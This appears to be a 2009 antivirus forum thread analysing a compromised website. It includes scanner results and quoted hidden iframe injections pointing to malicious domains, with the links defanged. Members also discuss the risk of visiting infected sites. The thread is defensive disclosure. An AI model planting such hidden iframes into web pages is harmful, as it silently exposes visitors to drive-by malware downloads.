Author Topic: nasha-russia.tv - HTML:Iframe-inf  (Read 7796 times)

0 Members and 1 Guest are viewing this topic.

Offline sewaq

  • Newbie
  • *
  • Posts: 1
nasha-russia.tv - HTML:Iframe-inf
« on: April 29, 2009, 01:27:06 PM »
hxxp://nasha-russia.tv/

Offline Omid Farhang

  • Malware Hunter
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1661
  • I wish I could write longer personal text!!
    • Omid's Site
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #1 on: April 29, 2009, 01:35:27 PM »
A virus or unwanted program has been detected
in the HTTP data on the requested page.

Requested URL:   hxxp://nasha-russia.tv/
Information:        Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32429
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #2 on: April 29, 2009, 09:56:25 PM »
Hi sewaq,

DrWeb's av link checker gives it as red - infected -
Checking: hxtp://nasha-russia.tv/
Engine version: 5.0.0.12182
Total virus-finding records: 539455
File size: 45.05 KB
File MD5: 4c7dd71d5934d7cab5a3aeefe3dfd339

hxtp://nasha-russia.tv/ - archive HTML
>hxttp://nasha-russia.tv//JavaScript.0 - Ok
>hxtp://nasha-russia.tv//Script.1 - Ok
>hxtp://nasha-russia.tv//Script.2 - Ok
>hxtp://nasha-russia.tv//Script.3 - Ok
>hxtp://nasha-russia.tv//Script.4 - Ok
>hxtp://nasha-russia.tv//Script.5 - Ok
>hxtp://nasha-russia.tv//JavaScript.6 - Ok
>hxtp://nasha-russia.tv//JavaScript1.1.7 - Ok
>hxtp://nasha-russia.tv//JavaScript1.2.8 - Ok
>hxtp://nasha-russia.tv//JavaScript1.3.9 - Ok
>hxtp://nasha-russia.tv//JavaScript.10 - Ok
>hxtp://nasha-russia.tv//JavaScript.11 - Ok
hxtp://nasha-russia.tv/ - Ok

Checking: hxtp://pagead2.googlesyndication.com/pagead/show_ads.js
File size: 29.44 KB
File MD5: 24c7aba78e61147132b46e48e6743e71

hxtp://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking: hxtp://lotbetworld.cn/in.cgi?income36
File size: 8978 bytes
File MD5: 98ccf1db761c14c99d26177ac88722b1

hxtp://lotbetworld.cn/in.cgi?income36 - archive MAIL
xttp://lotbetworld.cn/in.cgi?income36/ - archive HTML
>hxtp://lotbetworld.cn/in.cgi?income36//Script.0 infected with Trojan.DownLoad.35036

Checking: hxtp://nasha-russia.tv/includes/jscript.js
File size: 2849 bytes
File MD5: 50f24195e48db586910fffb5f7f5a614

hxtp://nasha-russia.tv/includes/jscript.js - Ok
Re: hxtp://virusinfo.info/showthread.php?t=44061

polonus
« Last Edit: April 29, 2009, 10:00:17 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7087
  • Be alert for error code - ID 10T
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #3 on: April 29, 2009, 10:12:28 PM »
***

Well, Polonus beat me to it but here is a little more information.

One iframe infection is outside the html tag at the top of the page and looks like this :

<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
(I changed the http to hxxp to disable the link)

I counted at least 12 javascript infections through out the page.

There are 2 more iframe infections outside the html tag at the bottom of the page :

<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>

Click the images below to enlarge.


***
« Last Edit: April 29, 2009, 10:15:52 PM by CharleyO »
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #4 on: April 29, 2009, 10:36:53 PM »
Went to the site without pro version and got infected. :-X
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7087
  • Be alert for error code - ID 10T
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #5 on: April 30, 2009, 12:52:59 AM »
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #6 on: April 30, 2009, 02:16:20 AM »
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

I wanted to see what the virus does. ;D Besides, I think I can remove the virus vai Boot-Time Scanning!
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32429
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #7 on: April 30, 2009, 02:32:31 AM »
Hi Donovansrb10,

People that download viruses to see what they do aren't just average users. These people download viruses in a special lab settings, where they cannot infect outside a virtual machine. They have to take a lot of precautions and need a lot of special analyzing tools. Well if you download Vitro file infector, you can see what is meant, if you do that you can completely f-disk, format and re-install your Operational System, so-called total recall, not a nice thing to experience, seeing your computer being ruined by a virus. Malware is no plaything, and malware should be kept from computers by all means. The real hero here is the man or woman or kid that did not have a virus for years and years, because he or she or it is computer-savvy and security aware,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 83009
  • No support PMs thanks
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #8 on: April 30, 2009, 03:19:46 AM »
That goes double when you have absolutely no idea what the payload at the other end of the link could be.

One member who I would also say is more experienced tried this and with out a robust back-up and recovery strategy (hard disk imaging, etc.) he ended formatting his system and reinstalling everything. What he got hit by was Vitro/Virut and you only have to check this forum to see the destruction it reaps with most ending up on a fdisk, format and reinstall.

So this strategy is IMHO totally stupid, unless you are on a test machine that you wipe after the test.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 1909 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.2.2401 (build 20.2.5130.570) UI-1.0.505/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro